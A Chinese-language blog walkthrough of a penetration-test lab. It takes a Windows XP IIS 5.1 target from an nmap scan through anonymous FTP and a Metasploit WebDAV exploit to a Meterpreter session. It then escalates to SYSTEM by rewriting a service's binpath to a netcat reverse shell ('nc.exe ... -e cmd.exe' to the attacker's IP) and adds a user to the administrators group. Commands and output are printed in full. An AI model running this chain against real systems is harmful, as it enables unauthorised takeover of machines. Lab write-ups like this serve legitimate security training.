nmap 渗透实列2

最新推荐文章于 2024-04-21 22:36:14 发布
最新推荐文章于 2024-04-21 22:36:14 发布
阅读量1.1k 收藏
点赞数 1
分类专栏: 安全 渗透测试 文章标签: nmap meterprete

nmap 渗透实列2

0x00 前言

该实列在上一实列的基础上 增加了提权的操作

0x01 案例分析

实验环境:

目标靶机:10.11.1.0/24

攻击机:Kali Linux (10.11.0.90)

渗透过程:

我们今天选取的目标靶机的IP为10.11.1.13。废话不多说,依旧nmap做端口探测。

# nmap -sS -sV -p 1-1024 -Pn 10.11.1.13

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-10 23:19 CST
Nmap scan report for 10.11.1.13
Host is up (0.33s latency).
Not shown: 1022 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
80/tcp open  http    Microsoft IIS httpd 5.1
MAC Address: 00:50:56:89:42:08 (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

分析扫描结果,目标靶机存在ftp服务和IIS5.1服务。

首先检查ftp是否存在匿名登录. 

# ftp 10.11.1.13
Connected to 10.11.1.13.
220 Microsoft FTP Service
Name (10.11.1.13:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 Anonymous user logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
01-17-07  07:42PM       <DIR>          AdminScripts
01-17-07  07:43PM       <DIR>          ftproot
01-17-07  07:43PM       <DIR>          iissamples
01-17-07  07:43PM       <DIR>          Scripts
08-22-17  09:27PM       <DIR>          wwwroot
226 Transfer complete.
ftp>

果然,存在ftp匿名登录问题且存在IIS的wwwroot目录。这样一个思路很自然就出现了,上传webshell至wwwroot目录即可,这里就不详细说明了。另外还有一个思路,从上面的扫描结果我们知道目标机器上运行了IIS5.1,搜索exploit-db我们发现了一个IIS WebDAV Write Access Code Execution漏洞且存在现成的Metasploit的利用模块,既然如此我们便来用MSF利用一下。

msf > use exploit/windows/iis/iis_webdav_upload_asp
msf exploit(iis_webdav_upload_asp) > set RHOST 10.11.1.13
RHOST => 10.11.1.13
msf exploit(iis_webdav_upload_asp) > set PATH /hahaha.asp
PATH => /hahaha.asp
msf exploit(iis_webdav_upload_asp) > run

[*] Started reverse TCP handler on 10.11.0.90:4444 
[*] Checking /hahaha.asp
[*] Uploading 609362 bytes to /hahaha.txt...
[*] Moving /hahaha.txt to /hahaha.asp...
[*] Executing /hahaha.asp...
[-] Execution failed on /hahaha.asp [No Response]
[*] Exploit completed, but no session was created.
msf exploit(iis_webdav_upload_asp) > exploit

[*] Started reverse TCP handler on 10.11.0.90:4444 
[*] Checking /hahaha.asp
[*] Sending stage (957487 bytes) to 10.11.1.13
[*] Meterpreter session 3 opened (10.11.0.90:4444 -> 10.11.1.13:3287) at 2017-08-12 05:57:47 +0800
[-] Connection timed out while trying to checking /hahaha.asp

meterpreter >

我们成功地获得了meterpreter,接下来的任务就是看看我们是否是SYSTEM权限了。

meterpreter > getuid
Server username: BOB\IWAM_BOB
meterpreter > sysinfo
Computer        : BOB
OS              : Windows XP (Build 2600, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

但是,这次似乎我们没有那么幸运了,我们的meterpreter并不是SYSTEM权限,但是我们获得了以下信息:

  • 目标机器是:Windows XP SP1

  • 当前的登录账户是:IWAM_BOB

    接下来,当然要思考的问题就是提权了。一般,提权有以下几种方式:

    1. 利用系统自带的服务或者系统本身的提权漏洞的exp,如:MS16-016(CVE-2016-0051)
    2. 利用安全的第三方的软件的漏洞来进行提权,如: MYSQL(CVE-2016-6662/6663)
    3. 还有一种极容易被大家忽略,即利用不正确文件和服务的权限设置

本案例中,主要演示一下第三种的提权方法。在开始提权之前,我们需要用到2个小工具:

  1. icacls(适用于win7及以上系统)/cacls (适用于winxp及win2000系统) – 系统默认工具,用于检查某个具体的文件夹或者文件的权限配置信息

  2. accesschk (sysinternals工具集之一) – 用于检查一个具体的用户或者组对于文件,目录,注册表,全局对象以及windows服务的权限信息

有了这2个有用的工具,我们便可以来进行提权尝试了。

首先,进入shell,查看系统目录,发现IIS的web目录的路径是:C:\Inetpub\wwwroot\ 

meterpreter > shell
Process 2544 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd c:\inetpub
cd c:\inetpub

C:\Inetpub>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 50C3-3741

 Directory of C:\Inetpub

08/22/2017  06:30 PM    <DIR>          .
08/22/2017  06:30 PM    <DIR>          ..
01/17/2007  07:42 PM    <DIR>          AdminScripts
01/17/2007  07:43 PM    <DIR>          ftproot
01/17/2007  07:43 PM    <DIR>          iissamples
08/22/2017  01:50 AM    <DIR>          Scripts
08/22/2017  06:27 PM    <DIR>          wwwroot
              11 File(s)      3,183,328 bytes
               7 Dir(s)   1,645,780,992 bytes free

接着,上传我们的工具,如;accesschk,netcat.

meterpreter > upload accesschk_xp.exe c:\inetpub\accesschk_xp.exe
[*] uploading : accesschk_xp.exe -> c:\inetpub\accesschk_xp.exe
[*] uploaded : accesschk_xp.exe -> c:\inetpub\accesschk_xp.exe
meterpreter > upload nc.exe c:\inetpub\nc.exe
[*] uploading : nc.exe -> c:\inetpub\nc.exe
[*] uploaded : nc.exe -> c:\inetpub\nc.exe

执行accesschk来检查当前用户IWAM_BOB具有写权限的windows服务,因为这些服务配置了过高的权限将有利于我们来实现提权操作。 

C:\Inetpub>accesschk_xp.exe /accepteula -uwcqv IWAM_BOB * > ack.txt
accesschk_xp.exe /accepteula -uwcqv IWAM_BOB * > ack.txt

C:\Inetpub>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 50C3-3741

 Directory of C:\Inetpub

08/22/2017  07:16 PM    <DIR>          .
08/22/2017  07:16 PM    <DIR>          ..
08/22/2017  07:15 PM           380,608 accesschk_xp.exe
08/22/2017  07:16 PM                67 ack.txt
01/17/2007  07:42 PM    <DIR>          AdminScripts
01/17/2007  07:43 PM    <DIR>          ftproot
01/17/2007  07:43 PM    <DIR>          iissamples
08/22/2017  07:15 PM            59,392 nc.exe
01/17/2007  07:43 PM    <DIR>          Scripts
08/22/2017  07:13 PM    <DIR>          wwwroot
               3 File(s)        440,067 bytes
               7 Dir(s)   1,670,123,520 bytes free

C:\Inetpub>type ack.txt
type ack.txt
RW SSDPSRV
    SERVICE_ALL_ACCESS
RW upnphost
    SERVICE_ALL_ACCESS

显然,我们找到了2个满足条件的windows服务,分别是SSDPSRV和upnphost。任意选择一个服务检查一下,如:SSDPSRV

C:\Inetpub>accesschk_xp.exe /accepteula -ucqv SSDPSRV
accesschk_xp.exe /accepteula -ucqv SSDPSRV
SSDPSRV
  RW NT AUTHORITY\SYSTEM
    SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
    SERVICE_ALL_ACCESS
  RW NT AUTHORITY\Authenticated Users
    SERVICE_ALL_ACCESS
  RW BUILTIN\Power Users
    SERVICE_ALL_ACCESS
  RW NT AUTHORITY\LOCAL SERVICE
    SERVICE_ALL_ACCESS

简单分析一下这个服务,我们可以发现这个服务可以使用NT AUTHORITY\SYSTEM权限来启动我们指定的二进制文件,也就是说我们可以以SYSTEM权限来反弹一个shell继而完成提权操作,具体操作命令如下: 

C:\Inetpub>sc qc SSDPSRV
sc qc SSDPSRV
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: SSDPSRV
        TYPE               : 20  WIN32_SHARE_PROCESS 
        START_TYPE         : 4   DISABLED
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\WINDOWS\System32\svchost.exe -k LocalService  
        LOAD_ORDER_GROUP   :   
        TAG                : 0  
        DISPLAY_NAME       : SSDP Discovery Service  
        DEPENDENCIES       :   
        SERVICE_START_NAME : NT AUTHORITY\LocalService  

C:\Inetpub>sc config SSDPSRV binpath= "c:\inetpub\nc.exe -nv 10.11.0.90 9090 -e cmd.exe"
sc config SSDPSRV binpath= "c:\inetpub\nc.exe -nv 10.11.0.90 9090 -e cmd.exe"
[SC] ChangeServiceConfig SUCCESS

C:\Inetpub>sc config SSDPSRV obj= ".\LocalSystem" password= ""
sc config SSDPSRV obj= ".\LocalSystem" password= ""
[SC] ChangeServiceConfig SUCCESS

C:\Inetpub>sc config SSDPSRV start= "demand"
sc config SSDPSRV start= "demand"
[SC] ChangeServiceConfig SUCCESS

C:\Inetpub>sc qc SSDPSRV
sc qc SSDPSRV
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: SSDPSRV
        TYPE               : 20  WIN32_SHARE_PROCESS 
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : c:\inetpub\nc.exe -nv 10.11.0.90 9090 -e cmd.exe  
        LOAD_ORDER_GROUP   :   
        TAG                : 0  
        DISPLAY_NAME       : SSDP Discovery Service  
        DEPENDENCIES       :   
        SERVICE_START_NAME : LocalSystem

至此,我们已经把SSDPSRV服务配置成了使用SYSTEM权限来执行nc反弹shell的服务了。

直接在攻击机(10.11.0.90)上重新开启一个监听窗口,如下:

root@kali:~# nc -lvvp 9090
listening on [any] 9090 …

在目标靶机(10.11.1.13)上开启SSDPSRV服务。

C:\Inetpub>net start SSDPSRV
net start SSDPSRV
The service is not responding to the control function.

最后,我们成功地反弹了一个SYSTEM权限的shell回来。 

root@kali:~# nc -lvvp 9090
listening on [any] 9090 ...
Warning: forward host lookup failed for bogon: Unknown host
connect to [10.11.0.90] from bogon [10.11.1.13] 3015
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net localgroup administrators
net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.

C:\WINDOWS\system32>net localgroup administrators IWAM_BOB /add
net localgroup administrators IWAM_BOB /add
The command completed successfully.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : 
        IP Address. . . . . . . . . . . . : 10.11.1.13
        Subnet Mask . . . . . . . . . . . : 255.255.0.0
        Default Gateway . . . . . . . . . : 10.11.1.220

C:\WINDOWS\system32>cd c:\
cd c:\

C:\>dir /b /s proof.txt
dir /b /s proof.txt
C:\Documents and Settings\Administrator\Desktop\proof.txt

0x02 小结

总结一下本案例的渗透过程:

  1. nmap进行端口探测
  2. 分析漏洞服务并利用
  3. 获取meterpreter shell并检查不安全的windows服务
  4. 配置windows服务以SYSTEM权限来执行反弹shell

  5. 开启windows服务获取SYSTEM权限的shell

    0x03 参考

    http://fuzzysecurity.com/tutorials/16.html

本文转自
安全小飞侠的窝【http://avfisher.win/archives/766

ChengKaoAO
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Nmap渗透测试数据库
12-14
Nmap能够很好地与Metasploit渗透测试数据库集成在一起,可以方便地在Metasploit终端中使用db_nmap,如:  msf > db_nmap -Pn -sV 10.10.10.0/24  该命令是Nmap的一个封装,与Nmap使用方法完全一致,不同的是其...
渗透--nmap
04-18
nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络...
渗透测试学习笔记之案例三
Fly_鹏程万里
07-06 3106
0x00 前言看到了不少小伙伴似乎对渗透测试学习笔记系列文章有点兴趣,今天,笔者刚好抽空继续来写写吧!0x01 案例分析实验环境:目标靶机:10.11.1.0/24攻击机:Kali Linux (10.11.0.90)渗透过程:我们今天选取的目标靶机的IP为10.11.1.13。废话不多说,依旧nmap做端口探测。# nmap -sS -sV -p 1-1024 -Pn 10.11.1.13 S...
Metasploit学习笔记(六)——Meterpreter后渗透之Hash攻击提权(包含Mimikatz)
Zichel77的博客
10-09 2483
针对WIN7,还是用永恒之蓝。
msf生成木马抓取hash值
最新发布
z65535的博客
04-21 433
结果显示:利用bypassuac漏洞模块对目标主机发起了攻击,成功绕过UAC限制,“Meterpreter session 2 opened ”–表明已经开通了192.168.88.132:4444和192.168.88.137:64588的新会话连接2。5.先用background把当前会话挂起,切换到msf目录下使用bupassuac模块来绕过uac的限制(这个方法比较看运气有可能成功,也有可能失败,需要多试几次),结果可以看到返回了多条可利用的漏洞模块信息。4.尝试提权(还是不行,接着在换个方法)
靶机渗透练习95-hacksudo:3
hirak0的博客
05-08 1331
靶机描述 靶机地址:https://www.vulnhub.com/entry/hacksudo-3,671/ Description This box should be easy . This machine was created for the InfoSec Prep Discord Server (https://discord.gg/tsEQqDJh) The box was created with Virtualbox ,but it should work with VMWare P
metasploit获取系统信息
天元喜羊羊的博客
04-27 1811
meterpreter > run scraper [*] New session on 192.168.1.142:445... [*] Gathering basic system information... [*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: O
Nmap常用命令总结
热门推荐
OKAY_TC的博客
11-21 4万+
1. nmap -sT 192.168.96.4 //TCP连接扫描,不安全,慢 2. nmap -sS 192.168.96.4 //SYN扫描,使用最频繁,安全,快 3. nmap -Pn 192.168.96.4 //目标机禁用ping,绕过ping扫描 4. nmap -sU 192.168.96.4 //UDP扫描,慢,可得到有价值的服务器程序 5. nmap -sI 僵...
看我如何快速拿下整个C段主机权限
渗透测试研究中心
01-24 462
0x01 前言Date/time:2015年,这次渗透测试中发现已经拿下的几台机器的管理员密码存在一定规律性,最终通过分析密码规律、组合新密码成功拿下目标整个C段机器权限,个人感觉这是个不错的内网通用/规律密码实战案例,所以想着还是记录一下吧。0x02 Getshell过程网站基本信息探测:目标站点:http://www.that****elos.com.br 服务器IP:189.**.**.2...
nmap常用命令
qq_36474601的博客
11-11 258
nmap学习 1、nmap + IP地址 普通扫描 nmap 192.168.1.135 2、clear进行清屏,使用命令扫描地址,常用扫描方式之一 nmap -sS -sV -T4 192.168.1.135 3、清屏,此命令为全面扫描的方式 nmap -A -T4 192.168.1.135 4、详细信息,如操作系统的信息 smb-os-discovery可以看出对方的主机名、域环境等信息 5、扫描一个网段多台主机 nmap 192.168.1.0/24 6、扫描nmap最可能开放的100
nmap
新火燎塬的博客
11-20 324
1.nmap xxx.xxx.x.xxx 2.nmap -sS -sV -T4xxx.xxx.x.xxx -sS 使用TCP SYN扫描 -sV 进行版本探测 -T4 使用的是一种快速扫面方式, 扫描速度的级别 范围在(T0-T5)之间,级别越高速度越快 3.nmap -A -T4xxx.xxx.x.xxx -A 采用全面扫描的方式 4.nmapxxx.xxx.x.0/24 扫描当前网段 5.nmap --top-ports 100xxx.xxx.x.xxx ...
Nmap常用命令及扫描原理
学生
11-04 1万+
nmap常用命令参数和扫描原理
Nmap常用参数
weixin_45750967的博客
10-22 736
Nmap常用参数 参数说明 -sT TCP connect()扫描,这种方式会在目标主机的日志中记录大批连接请求和错误信息。 -sS 半开扫描,很少有系统能把它记入系统日志。不过,需要Root权限。 -sF -sN 秘密FIN数据包扫描、Xmas Tree、Null扫描模式 -sP ping扫描,Nmap在扫描端口时,默认都会使用ping扫描,只有主机存活,Nmap才会继续扫描。 -sU...
Linux更改密码报错:密码未通过字典检查 - 过于简单化/系统化
一个懒鬼的博客
06-19 8023
并且不要使用你的真实名称、父母、配偶、孩子的名字,或者你的生日作为密码。正如你在上面样例中看到的一样,我们设置了密码中至少含有一个大写字母、一个小写字母和一个特殊字符。你可以设置被最大允许的任意数量的大写字母、小写字母和特殊字符。现在你了解了 Linux 中的密码策略,以及如何在基于 DEB 和 RPM 的系统中设置不同的密码策略。另外,密码必须至少包含一个大写字母、一个小写字母、一个数字和一个其他字符。你还可以设置密码中被允许的字符类的最大或最小数量。正如你在上面看到的输出一样,该密码是无限期的。
浅谈反弹shell
weixin_53284312的博客
01-12 2318
反弹shell
【VulnHub系列】DC-5靶机
薛定谔嘚喵博客
03-10 259
DC-5靶机
kali linux篇之nmap常用命令
白帽小学二年级的博客
03-22 6165
nmapnmap -sS -sV -T4 192.168.172.131 -sS:使用TCP SYN扫描 -sV:进行版本探测 T0-T5 表示扫描速度,数字越大速度越快 nmap -A T4 192.168.172.131 -A:采用全扫描,与上一个差不多,信息多一点 nmap 192.168.1.0/24 扫描该网段存活主机的开放的端口状态及服务 nmap --top-ports 100 192.168.1.125 扫描对方最常开放的100个端口 nmap --script=vuln
kali linux网络扫描~局域网扫描
十一、的博客
04-29 1万+
理论知识 IP地址是由两部分组成,即网络地址和主机地址,网络地址表示其属于互联网的那一个部分,主机地址表示其属于该网络中的那一台主机,二者是主从关系 IP地址根据网络号和主机号,分为三类和特殊的两类: A类:1.0.0.0—126.0.0.0:子网掩码255.0.0.0 B类:128.0.0.0—191.255..0.0:子网掩码255.255.0.0 C类:192.0.10—223.255.255.0:子网掩码255.255.255.0 D类:多播地址:224.0.0.0—239.2...
nmap 渗透测试脚本
08-17
Nmap(Network Mapper)是一个广泛使用的网络扫描和渗透测试工具。它可以帮助安全专业人员评估网络的安全性,并发现潜在的漏洞和安全风险。 虽然Nmap本身不是一个脚本,但它提供了Nmap脚本引擎(NSE),允许用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值